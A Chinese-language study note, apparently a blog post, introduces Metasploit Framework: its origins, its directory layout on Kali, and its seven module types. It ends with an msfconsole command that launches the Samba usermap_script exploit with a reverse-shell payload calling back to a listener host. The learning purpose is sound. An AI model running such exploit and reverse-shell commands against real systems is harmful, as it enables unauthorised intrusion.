简介

msf全称Metasploit Framework,是一款功能强大的开源渗透测试工具,它提供了丰富的漏洞利用模块、扫描工具、Payload生成器和框架等功能。MSF最初由HD Moore于2003年创建,现在由Rapid7维护和发展。
因为msf是一个框架,所以可以根据自己的需求进行功能开发。

本学习基本来自官网教程----https://www.offsec.com/metasploit-unleashed/filesystem-and-libraries/
但是官网是英语,学习还是比较费劲的(英语lower的我)。

详解

msf体系图

2023-06-26T09:28:33.png

msf在kali目录

主目录在\usr\share\metasploit-framework
2023-06-26T09:32:52.png

  • data目录包含Metasploit用于存储某些漏洞利用、单词列表、图像等所需的二进制文件的可编辑文件
  • documentation目录包含框架的可用文档
  • lib目录包含框架代码库的核心代码
  • modules目录中,您可以找到用于漏洞利用的实际MSF模块、辅助模块和后期模块、有效载荷、编码器和nop生成器。也是最主要的模块,是接下来重点学习的部分
  • plugins目录存储着msf的插件
  • scripts目录存储着脚本文件
  • tools目录中有各种有用的命令行实用程序

modules模块

modules既上文提到的modules目录。包含了很多模块,这些模块是msf最主要最常用的功能,基本上包含了整个渗透流程所需工具。
一共有七个模块,分别是ExploitsAuxiliaryPayloadsEncodersNopsPostEvasion

  • Exploits,包含了很多漏洞的exp
  • Auxiliary,是个辅助模块,主要用来信息收集,包括端口扫描仪、模糊器、嗅探器等
  • Payloads,包含了很多漏洞的payload
  • Encoders,编码模块,可以用来大多数的编码解码
  • Nops,空操作模块,用于填充数据,以维持有效负载结构的完整性
  • Post,后渗透模块,用于在目标系统上执行各种后渗透操作,如收集敏感信息、提权、横向移动等
  • Evasion,免杀模块,用于生成一些免杀木马

msfcli

msfcli是早期的msf命令行接口,可以通过此接口来使用一些msf功能模块。
2015-06-18后被弃用,可以使用msfconsole -x 来替代,例如:

root@kali:~# msfconsole -x "use exploit/multi/samba/usermap_script;\
set RHOST 172.16.194.172;\
set PAYLOAD cmd/unix/reverse;\
set LHOST 172.16.194.163;\
run"